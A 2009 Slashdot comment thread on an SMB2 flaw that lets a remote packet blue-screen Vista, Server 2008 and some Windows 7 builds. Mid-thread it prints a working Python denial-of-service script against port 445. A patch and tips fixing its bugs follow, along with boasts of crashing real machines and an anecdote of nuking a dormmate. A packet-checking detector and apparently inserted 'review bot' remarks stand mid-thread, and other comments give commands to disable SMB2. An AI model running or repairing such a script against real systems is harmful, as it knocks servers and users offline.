Windows 7 Reintroduces Remote BSoD
David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."
If it relies on a SMB2 request, it is most likely restricted to requests from inside the LAN.
Either way, still bad.
You could also do the same to some Linux builds in the good old days. I'm sure this will be fixed soon.
...half the world is behind a NAT setup now, and the other half has Windows firewall enabled. Windows update exists now so people will be able to patch quickly and easily when a patch arrives.
Realistically this isn't going to affect many people like the old exploit did.
Still, it's quite comical, maybe this is Microsoft's take on the saying "The old ones are the best". So much for their secure development practices, there's really no excuse for them not picking this one up before release.
It's incredibly unlikely to ever affect anyo
http://twitter.com/onion2k
need to rebind a key in fluxbox and dig out my "spank" keycap from 2003....this exploit was pretty effective though, being the modern day equivalent of a highway driver with a tow missile.
Good people go to bed earlier.
- Shiny-new interface.
- No annoying "are you sure" popups every 30 seconds like Vista.
- Can run on a 1 gigabyte machine without slowing to a crawl.
It simply wasn't possible for Microsoft to make such a great perfect OS without including a flaw.
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
Although I don't think Windows 7's feature list is stable yet, and I expect to see this one pulled before the release.
Pity.
You must be new here.
lollerskates
Having actually tried this on three Windows 7 machines now, it doesn't seem to work on every machine. (Actually, it's yet to work on any here, although I hear tell that it does work on some). There's something more to this than just "that data crashes it every time".
"Commodore Amiga is better!"
"No Atari ST is better!"
"No Amiga!"
"No Atari!"
"Amiga!"
"Atari!"
Oh that's not the debate you were looking for? Sorry. Let me update that ancient debate for the modern world:
"Apple Macintosh is better!"
"No Microsoft PC is better!"
"No Apple!"
"No Microsoft!"
"Apple!"
"Microsoft!"
(an ancient debate... just as juvenile today as it was 20 years ago)
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.
And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.
http://rocknerd.co.uk
...that my fellow Boston Public School graduates are writing for seclists.org.
Section V: "An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable. "
Yes, because we been done had seen that explot in the pasts.
Dear $DEITY, are there no proof readers or editors alive on these sites?
they don't like introducing "new" things
A slight correction, they like to introduce new things when it suits them. Why the rewrite of SMB into SMB2? Well, it has some technological advantages you would expect but according to Wikipedia:
SMB 2 has two big benefits to Microsoft. The first is clear intellectual property ownership. SMB 1 was originally designed by IBM and was shipped on a wide variety of non-Windows operating systems such as SCO Xenix, OS/2 and DEC VMS (Pathworks). It was partially standardised by X/Open and also had draft standards for IETF which lapsed. (See http://ubiqx.org/cifs/Intro.html for historical detail).
The second benefit is a clean break. Microsoft's SMB1 code has to work with a huge variety of SMB clients and servers. A large number of items in the protocol are optional (such as short and long filenames), there are many infolevels for commands (selecting what structure is returned to a particular request), Unicode was a later addition etc. With SMB2 there is significantly reduced compatibility testing (currently only other Windows Vista clients and servers). Additionally the code is a lot less complex since there is far less variability (e.g. there is no need to worry about having Unicode and non-Unicode code paths as SMB2 requires Unicode support).
So you can see they like to introduce new things when it means they have clear intellectual property ownership rights over it and also a lot less work for them. They also don't have to be backwards compatible with their own products.
While SAMBA 4.0 has experimental support for SMB2 interfacing, I'm guessing the "clear intellectual property" could spell trouble moving forward for Tridgell and the SAMBA team.
My work here is dung.
Let me Loony Tunes that up for you:
Wabbit Season!
Duck Season!
Wabbit Season!
Duck Season!
Summation 2
Apple was better then too.
IT departments are going to keep everything patched, and individuals aren't going to do it to themselves on their LANs. Between firewalls and NATs, it's not going to happen over the internet. Really, the only situation that I can imagine this happening is perhaps on a university network.
Don't take life so seriously. No one makes it out alive.
Windows 7 enables firewall by default, so wouldn't it practically stop this anyways for ordinary clients?
Hi. I'm an adult. I work as a software engineer.
I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.
I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.
If you want to attract intelligent, grown-up people to Linux you need to stop doing certain things.
1) Don't act as if users of other operating systems are less intelligent than you. It turns out that Linux-advocacy isn't the entire world, and that leaders in different fields (or even this one!) might be using Windows. They're not "lusers", they just have priorities different from your own.
2) Don't act as if Linux hasn't had equally stupid stuff happen to it. Yes, it's a different process altogether, and I would dare say that bugs are less likely due to its open source nature, but they still happen. One that I can remember off the top of my head is Debian's guessable SSL keys.
3) Try—for ten minutes—to give the impression that half of your time isn't devoted to bashing an OS you believe is irrelevant.
4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.
"And not exploitable out of the box since SMB and SMBv2 are both firewalled"
What do you mean, is this firewall the software one built into Vista or an external one? If so then it's relying on the same TCP/IP stack to protect it.
Vulnerable systems are all with SMB2 drivers: Vista, W7 and probably Server 2008
:) normal value should be "\x00\x00"
/joke
The exploit (which is actually ridiculously simple) goes as follows:
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: -->
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
Current problem solution: disable the SMB protocol on your infrastructure..
Now please excuse me, I have to go and play a bit with our network admin..
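A detection-side reading of the same header, as an added example that is not part of the original thread: it parses a NetBIOS-framed SMB1 Negotiate Protocol request and flags a non-zero Process ID High field, which the comment above says should normally be "\x00\x00". The function names, the severity labels and both sample frames are constructed for illustration.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# Fixed 32-byte SMB1 header, little-endian: magic, command, status, flags,
# flags2, Process ID High, signature, reserved, TID, PID low, UID, MID.
HEADER = struct.Struct("<4sBIBHH8sHHHHH")
MIN_FRAME = 4 + HEADER.size + 3  # framing + header + word count + byte count


def parse_negotiate(frame):
    """Return {'pid_high', 'dialects'} for an SMB1 Negotiate request, else None."""
    if len(frame) < MIN_FRAME or frame[0] != 0x00:
        return None
    length = int.from_bytes(frame[1:4], "big")
    msg = frame[4:4 + length]
    if len(msg) < HEADER.size + 3:
        return None
    fields = HEADER.unpack_from(msg)
    magic, command, pid_high = fields[0], fields[1], fields[5]
    if magic != SMB1_MAGIC or command != SMB_COM_NEGOTIATE:
        return None
    word_count = msg[HEADER.size]
    off = HEADER.size + 1 + 2 * word_count
    if len(msg) < off + 2:
        return None
    (byte_count,) = struct.unpack_from("<H", msg, off)
    data = msg[off + 2:off + 2 + byte_count]
    # Each dialect is a 0x02 marker followed by a NUL-terminated ASCII name.
    dialects = [d[1:].decode("ascii", "replace")
                for d in data.split(b"\x00") if d[:1] == b"\x02"]
    return {"pid_high": pid_high, "dialects": dialects}


def check_frame(frame):
    """Return a finding dict for a suspicious Negotiate request, else None."""
    neg = parse_negotiate(frame)
    if neg is None or neg["pid_high"] == 0:
        return None
    # A non-zero field is worth logging on its own; it matters most when the
    # client is also asking to negotiate an SMB 2 dialect.
    offers_smb2 = any(d.startswith("SMB 2") for d in neg["dialects"])
    return {
        "severity": "high" if offers_smb2 else "info",
        "pid_high": neg["pid_high"],
        "offers_smb2": offers_smb2,
    }


# Constructed sample input (not captured traffic): a Negotiate request with
# every header field zero, offering one SMB1 dialect and "SMB 2.002".
_DIALECTS = b"\x02NT LM 0.12\x00\x02SMB 2.002\x00"
_MSG = (HEADER.pack(SMB1_MAGIC, SMB_COM_NEGOTIATE, 0, 0, 0, 0,
                    bytes(8), 0, 0, 0, 0, 0)
        + b"\x00" + struct.pack("<H", len(_DIALECTS)) + _DIALECTS)
SAMPLE_NORMAL = b"\x00" + len(_MSG).to_bytes(3, "big") + _MSG
# Same frame with the two Process ID High bytes (frame offset 16) set non-zero.
SAMPLE_NONZERO = SAMPLE_NORMAL[:16] + b"\x01\x00" + SAMPLE_NORMAL[18:]

if __name__ == "__main__":
    for name, frame in (("normal", SAMPLE_NORMAL), ("non-zero", SAMPLE_NONZERO)):
        print(name, parse_negotiate(frame), check_frame(frame))
```

The same check can be run over reassembled TCP payloads bound for port 445 from a packet capture; frames that are not SMB1 Negotiate requests, or that are truncated, return None rather than raising.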
I needed to change a few things to get it to work for me.
I added "import socket" and changed "socket()" to "socket.socket(socket.AF_INET, socket.SOCK_STREAM)"
Hardly
Ooohhhhh, my head.
It's NOT me! It's the meds! I'm on 1000mg of Fukitol.
Or to be more apt (for slashdot)... some people prefer Ford, some prefer Dodge, others still prefer Toyota. Gas is better for some applications, while Diesel is better for others, while electric is better for others.
When a new car line comes out, new defects are to be expected on occasion. Sometimes there are even defects present that were fixed in previous models.
--- Smb-Bsod2.py 2009-09-08 09:35:58.000000000 -0500
+++ Smb-Bsod.py 2009-09-08 09:22:12.000000000 -0500
@@ -1,6 +1,7 @@
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
+import socket
from time import sleep
host = "IP_ADDR", 445
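Review bot: the context line "# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket" still carries the original import inside the comment, and the added "import socket" works around it rather than cleaning it up. Trim the stray "from socket import socket" text out of the comment so the header is documentation only and the file has one visible import. The "---"/"+++" headers also name Smb-Bsod2.py (09:35:58) as the old file and Smb-Bsod.py (09:22:12) as the new one, which reads as reversed; say in the post which file is the edited copy.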
@@ -22,7 +23,7 @@
"\x30\x30\x32\x00"
)
-s = socket()
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.send(buff)
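Review bot: the hunk header "@@ -22,7 +23,7 @@" declares 7 lines on each side, but only 5 are present per side as posted, so lines were lost in pasting and the patch will not apply cleanly; repost it with the missing context intact. On the added line itself, AF_INET and SOCK_STREAM are already the defaults of socket.socket(), so once "import socket" is in place a plain "socket.socket()" is the smaller change.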
I love it when Slashdot can't post an accurate headline. This is a flaw in SMB 2.0, which is present in Windows Vista, Windows Server 2008, Windows 7, and probably Windows Server 2008 R2 as well. This is not new to 7, it's a common flaw in all the implementations of SMB 2.0. XP isn't affected because XP can't speak that protocol.
When in danger or in doubt, run in circles, scream and shout. --Robert A. Heinlein
The article makes it seem like it hasn't been in Windows since Windows NT and that Windows 7 is the first time it's reappeared. Seriously, Vista has it.
Is this a case of "It's after midnight, must post another slam on Microsoft, even if we have to twist and stretch like taffy to make the case"?
It wouldn't be so bad but the body of the submission is incredibly slanted, almost more than some of the replies.
Politics is the art of looking for trouble, finding it everywhere, diagnosing it incorrectly and applying the wrong fix.
My sample size of "one" is obviously not conclusive, but I just tested this on Win 7 Enterprise.
To my disappointment, the Win7 box didn't BSOD.
So, which is the one who falls for the Bugs Bunny Argument Reversal trick?
M$Borg: Microsoft!
MacBoi: Apple!
M$Borg: Microsoft!
MacBoi: Apple!
M$Borg: Microsoft!
MacBoi: *slight pause*
MacBoi: Microsoft!
M$Borg: Apple!
MacBoi: Microsoft!
M$Borg: Apple!
MacBoi: Okay, you win. Apple.
M$Borg: Wait... what?
Let us hope Samba does not replicate this with its SMB2 Server.
Speaking of going back to the '90s...
Why is /. using frames?
Oh, I'm sure on the back end it's some web 2.0 dynamic XCSS crap, but on the front end, it looks like a frame, it walks like a frame, it quacks like a frame.
It's a frame.
In firefox 3, I go to slashdot.org. Then I click a link to the IT section. Browser address bar still reads "slashdot.org" (no IT.)
I click a story link, then click the back button.
The browser goes back to slashdot.org, not it.slashdot.org.
Seriously, WTF?
None since. (5 days since install now) It was an upgrade over Vista. It was like going down Nostalgia Lane.
Out of any sufficiently large community, some will engage in the sort of things you describe, or similar or complementary things. Corporate marketing campaigns are largely relying upon evoking those sentiments in the people they target (irrational 'we're #1' mentality without substantial real justification).
1) The chances of making every last Linux user refrain from that are about as likely as having every last Windows user refrain from considering every last willing Linux user an elitist snob who engages in what you describe.
2) That is true, though the severity of your example is far far less bad. I would use one of the various local privilege escalation vulnerabilities (some which were in the kernel undiscovered almost as long as this was in Windows), though even that isn't quite as severe as an unprivileged remote access crash in some measures (in others, admittedly, DoS is much less bad than privilege escalation, though I rarely hear of Windows infrastructures banking on avoiding local privilege escalation much).
3) Again, this may be true of some of the community, it is also true of the Windows community (look at a few random message boards, you'll see Windows users looking equally foolish).
4) I don't see a correlation between meme-spouting and Linux usage. I also see no evidence that Linux people like xkcd any more than non-Linux people (though I don't see how xkcd is construed as a particularly bad thing).
In short, if you want a community larger than 30-50 people that is completely devoid of people who fail to meet your standards, you might as well give up on any community.
XML is like violence. If it doesn't solve the problem, use more.
Fixed the subject line for you.
But none of those vehicles are self crashing.
Change is certain; progress is not obligatory.
So I'm reading a lot about this is no big deal because most places have it firewalled off, or most people are behind NAT, etc, etc...
OK, well, tell that to a place like a college that has 50,000 student accounts who all need access to file servers to get their files. You can't just turn off file sharing or block them on the firewall. All it takes is for one 1337 user to show off his mighty hacker skillz by BSOD'ing the servers to ruin things.
At least where I work we are still at 2003 Server -- thankfully.
See this: http://www.heise.de/security/Luecke-in-Windows-Vista-und-7-ermoeglicht-Neustart-aus-der-Ferne--/news/meldung/144986 (German). Heise tested the available exploit and found Vista affected but not Windows 7.
hahaha only on slashdot would that be modded 'informative'
nice work :)
Works on fully patched Server 2008 too
Yes, I would imagine so.
And this is why: JUDGMENT OF THE COURT OF FIRST INSTANCE (Grand Chamber)
17 September 2007
Are you seriously thinking they might renege on a punishment (samba interoperability documentation) dealt out at the cost of half a billion euros?
When this packet hits a pocket on a socket on a port,
Your whole damn OS pauses to abort...
kmem russian roulette: Aquillar> dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
... this can't be possible. Windows is made by *professionals*. If anything, those Linux amateurs are just trying to smear Microsoft with lies. .... jokes aside... It's a shame that microsoft has so much fackin revenue and yet their products are always seemingly half-assed. Throw another million at it! The guy who discovered this exploit should be on your payroll! ... oh wait.. the execs and stockholders aren't rich enough yet!
I wonder how the math works out when comparing advertising and investing in politicians (lobbies) vs developing a solid product in terms of ROI.
My favorite SMB2 exploits are detailed here.
Unfortunately, any group tends to have its selection of self-important, infantile, self-righteous whiners. Equally unfortunately, they tend to be the more vocal members of said groups.
Don't let the leetiods scare you off, there are plenty of sane Linux users or admins around here. Filter out the rest and all will be well.
Mind you, Linux is for those that have a reason to use it (even if the reason is just curiosity), so exempting the leetiots perhaps you need a stronger reason yet to "join the community," just don't worry that a frontal lobotomy is a requirement for such.
I love Win 7, I have been running it on my laptop since the public beta came out, I have not found anything I don't like, if this is the worst thing you can come up with about Windows 7. As far as I am concerned, it's as good as XP or better.
Um, fail? Check the comment line above your import.
'Cause this can be prevented pretty easily by blocking the SMB ports, and if you're a business you'd be insane not to have a firewall anyway.
I've abandoned my search for truth; now I'm just looking for some useful delusions.
watch out! antisec is headed to your favorite desktop ;o
Back in October 1998, Microsoft fixed a vulnerability in Internet Explorer 4 where a dotless IP address (represented as a single, unsigned 32-bit integer, which was legal in IPv4) would be treated as being on the local network rather than on the Internet at large. Basically, their programmers took a shortcut and assumed "no dots = local". (MS98-016)
This was re-introduced in IE 5 three years later and had to be fixed AGAIN. (MS01-051)
I've been waiting to see if they end up re-introducing this one, or if they learned their lesson well enough the last time.
As Joel Spolsky points out, this is exactly what happens when you rewrite software. The old software had lots of bug fixes. If your development shop made a particular mistake once, it's likely to do it again when you reimplement. It's unclear whether this was the case for IE 5 (no idea if that area of the code was rewritten), but it seems like this may have bitten Microsoft with the teardrop vulnerability.
Me and my coworker tried this on an updated Windows 2008 today and none of us could believe what happened. The server just dies mid-air and throws a proud BSOD.
Am I the only one surprised something like this could slip through all the supposed testing done by Microsoft? Have they even run a fuzzer against their code at all? If blatantly obvious holes like this go unseen in the new TCP/IP SMB2 code, rest assured a whole slew of new holes will be found later.
Funniest thing is that this doesn't affect XP while Microsoft touts Windows 7/2008 as the safest OS ever. I guess it's all marketing and just blatantly nothing done about security other than to blame everything on the user by passing every security decision onto the user with UAC.
HTTP/1.1 400
I've only been able to get this to work against Vista Ultimate SP2 and Windows Server 2008 SP2. I've not gotten this to work on Windows 7 RTM and Windows 2008 RTM yet... and yes, I disable the firewalls to be sure.
Windows is such a super sick beast that can not exist without vulnerabilities. Every hole and BSoD is not a bug. It is a classical Windows feature. :)
Welcome back, "teardrop" BSoD!
Watch out Marty....the Flux capacitor is at full capacity and a Smurf attack is imminent!
WTF? Over?
I think you'd get alcohol poisoning half-way through the drinking game.
But I have fond memories of the exploit called Win Nuke to cause the BSOD. Back in the day, I was a freshman in college and a football player on our floor was continuously giving me a hard time. In those days, we telnetted into the DEC Alpha to check our email. Also, in those days our IPs were statically assigned and we had no firewall. Those were quite obviously better, more trusting days of the internet. Anyhow, one day I waited until I knew he was in his room and checking email from his computer. I used finger on UNIX to get his IP address. Then, nuke away! I could hear him banging, cussing, and throwing his stuff around. So, whenever I needed a little fun, I simply delivered that little exploit. One day he came back from a drunken binge and went to check his email and I felt it was a perfect time to test his patience level. After carefully delivering the little packet, I heard a smashing sound. My guess is he decided to do a body slam, WWF style, on his PC. As I walked by I casually asked what happened as I saw the computer smashed to smithereens. He told me to, "Get outta here, shit nugget!" It was all I could do to keep from bursting out laughing. Moral: Leave the IT guy alone.
The bug is yet another Vista 7 failure due to M$'s inclusion of digital restrictions management. M$ has proved once again Windoze 7 is Vista Service Pack as this "bug" also affects Vista and Vista Server 2008, all of which comes at the cost to your freedom and security.
--
Friends don't help friends install M$ junk.
Friends do assist M$ addicted friends in committing suicide.
I already had my share of BSoDs on Windows 7. Moved back to XP. Hadn't a BSoD there on the exact same machine ever.
WTF? You sound like a baby. Stop crying and face the fscking world already!
Not tested, but Petri is a pretty solid resource: http://www.petri.co.il/how-to-disable-smb-2-on-windows-vista-or-server-2008.htm
body massage!
I don't care, I'm still very fond of 7 (running RTM for a month was a pleasant experience). I'm actually signed up to throw a party, although I won't throw any party, I just want a free copy of 7 lol. Every OS isn't perfect. 7 is definitely a nice change of pace from XP, and Vista, like ME, should be forgotten ASAP.
Visit my Forums?
Just to clarify the comment prior to mine...
Simply adding a linefeed in the right place in the comment would perform the import properly. In other words, the GP post says:
and it should be
I love it when Microsoft self-sabotages. Windows 7 was already being called "Vista: Fixed"; now it's introducing fun new ways for "Vista" to fail. But let's be fair to Microsoft; they don't like introducing "new" things, so in tune with this philosophy, they're merely re-releasing an old problem and packaging it differently ;)
This is actually introduced with Vista, and not Win7 -- making the title and summary just wrong. Something new and different for /....
Ummm... well done and truly informative, the way you copied and pasted directly from the security bulletin linked to in TFS...
Back in the mid/late 90's, we had a Btrieve-based app running on our Novell network. The client app ran on each local workstation, Win95 at the time. One of the resident computer experts (helpdesk guy) discovered a "tool" that would allow him to send the ping o'death to any machine on the network. He amused himself merrily, randomly crashing machines for nearly a week. Problem was, each time he crashed a machine, the Btrieve database would get corrupted or records would be left locked, requiring intervention by me to get things working again. Once I figured out who was doing it, I warned him to stop. He didn't, so I reported him to senior management. He was fired immediately.
Looks like the winnuke application has been updated already. LOL
http://rapidshare.com/files/277352935/WinnukeV7.zip.html
Of course it is _VERY_SERIOUS_, unprivileged user-land electively crashes kernel of every machine it can route TCP packets to, WTF are you stupid or something?
Verified BSOD with Windows Vista Basic, have to move the "from socket import socket" to its own line without being commented.
Ah the good old days of early IRC, watching people go poof on a regular basis.
---- Booth was a patriot ----
proof-of-concept code can sometimes contain subtle or minor bugs on purpose so that someone completely uninitiated can't just go and abuse it.
XP isn't affected because XP can't speak that protocol.
To be fair, this vulnerability seems to prove that none of Vista, WS2k8, or Win7 know how to speak SMB 2.0 (correctly) either... ;-)
Guess the author has never seen #! lines or the file command then...
I've just tested it on 3 of my Server 2008 R2 machines here (final build, technet ftw). It was unable to crash any of them. I wonder if 2008R2 has any new SMB code we don't know about yet?
Note: all 3 2008R2 machines have open (guest-authable) fileshares available via SMB.
What's wrong Twitter? All of your accounts in karma hell? BTW, your suicide comment you made only shows your stupidity.
Friends don't help friends install Communist Linsux.
SMB2 is not required, it can be disabled.
From an Administrative prompt issue the following:
"net stop mrxsmb20"
To make the change permanent, also issue:
"sc config lanmanworkstation depend= bowser/mrxsmb10/nsi"
"sc config mrxsmb20 start= disabled"
Seriously, why is everyone getting so bent over something that is a three-line permanent fix?
FOOL! You're NOT supposed to PROVIDE THE FIX!!!!!!!!
I can already see the script-kiddy whordes descending on your post!!!!!
Windows 7 hasn't even launched yet, so don't cry too hard.
but....I thought Windows 7 was the most secure version of Windows ever?
Um, you're an idiot.
That's one way to crash a Windows 7 party.
Also, it isn't related to the TCP/IP stacks, or the teardrop attack. It is totally unrelated except that it causes a BSoD.
Your post implies that this is somehow redeeming to Microsoft. It is actually worse - the problem has been there for so long, it is present in Win7 too, thus the vector of attack is larger. This speaks volumes about the real security of new Microsoft products.
There are times like the recent article about how Microsoft photoshopped a black guy out of some marketing material destined for Poland where there are no black people, where the frantic voices of slashdot bashing Microsoft I find irrational and too strident.
And then there are the far more numerous articles where there's some real problem with a current Microsoft product where some people feel determined to defend Microsoft no matter how much they must stretch reason or reach to find offense in the poster.
Your post is more of the latter than the former -- and so I must wonder how it became moderated so well. Twice interesting and once overrated. That's maybe more than I would give it.
Help stamp out iliturcy.
I have tested it on Windows 2008 x64 and Windows 7 (had to allow SMB through the firewall on 7 as it was blocked by default)
And got some lovely blue screens to admire!
http://blog.tommed.co.uk/2009/09/08/how-to-blue-screen-windows-remotely-with-python
Tested this on my own system, using my Linux dev box to attack Windows 7 running inside VirtualBox 3. No luck, Windows just sits there.
So basically several recent versions of Windows, the ones using the 'SMB2' protocol, can be crashed if someone on the same LAN sends a crafted packet?
How is this possible from a technical point of view?
It must have something to do with the way Windows is conceived.
I can imagine the "fix"... The fix is going to be something like "If packet starts with ..." then drop the packet.
However that's a shitty way to 'fix' the problem. The problem is obviously deeply engrained in the way Windows is conceived and the way Windows is conceived is deeply engrained in pathetic programming practice.
Seriously, all Microsofties, how the heck is it even possible that a machine can be remotely crashed just by receiving a malformed packet?
How can you buy such mediocrity?
I realize /. is full of paid M$ astroturfers but there's seriously not much you can do here to take MS's defense.
How is this even possible?
A remote BSOD?
Woaw. Just plain woaw.
For weeks I have been listening to some IT guys tell me how great and foolproof 7 is. I am going to have so much fun this afternoon!
What's a BSoD?
I am not devoid of humor.
don't let the facts get in the way of a good microsoft bash eh lads?
You're all a bunch of stupid trolls.
The software maker said the latest issue affects the "release candidate" version of Windows 7, but not the final version that was completed in July. Also, the recently completed Windows Server 2008 R2 is not vulnerable, Microsoft said, nor are the earlier Windows XP and Windows 2000 operating systems.
Right, so R2, XP and 2000 are not vulnerable and it looks like Vista needs a patch - kudos to MS for fixing it quickly - more than most companies do.
http://news.zdnet.com/2100-9595_22-340550.html